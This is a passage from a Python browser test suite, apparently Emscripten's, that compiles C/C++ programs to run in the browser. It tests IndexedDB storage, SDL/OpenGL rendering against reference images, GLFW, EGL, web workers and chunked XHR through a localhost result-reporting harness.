self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'], timeout=60)'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
open('data.dat', 'w').write(' ')
run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
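# Each stage selects a different code path in tests/idbstore.c (the stage semantics live there); the
# sequence deliberately revisits earlier stages so later runs are checked against already-persisted state.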
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'])
@requires_threads
def test_force_exit(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('force_exit.c', force_c=True, expected='17', args=args)
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
@requires_graphics_hardware
def test_egl(self):
open(os.path.join(self.get_dir(), 'test_egl.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
run_process([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl.c'), '-o', 'page.html', '-lEGL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
run_process([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html', '-lEGL', '-lGL'])
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def do_test_worker(self, args=[]):
# Test running in a web worker
open('file.dat', 'w').write('data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.test_port)
html_file.close()
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
assert os.path.exists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20|' + ('data%20for%20w' if file_data else '') + '|')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.test_port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
run_process([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # mask to an unsigned 32-bit value (Python 2's adler32 may return a signed int)
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.test_port))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
# Avoid a race condition on cleanup: wait a bit so the processes have released their file locks,
# otherwise the test tearDown would attempt to rmdir() files that are still in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(30, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut'] + (['--proxy-to-worker'] if proxy else []), timeout=30)
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
run_process([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')),
args=args,
timeout=30)
@requires_graphics_hardware
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1', '-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
# NOTE: Should FULL_ES3=1 imply client-side vertex arrays? The emulation needs FULL_ES2=1 for now.
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'USE_WEBGL2=1', '-s', 'FULL_ES2=1', '-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
@requires_threads
def test_emscripten_api(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'] + args)
def test_emscripten_api2(self):
def setup():
open('script1.js', 'w').write('''
Module._set(456);
''')
open('file1.txt', 'w').write('first')
open('file2.txt', 'w').write('second')
setup()
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
run_process([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'EXIT_RUNTIME=1']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by the dEQP test suite (we can remove this test later if we add coverage for running that suite).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_proc(self):
open('side.c', 'w').write(r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
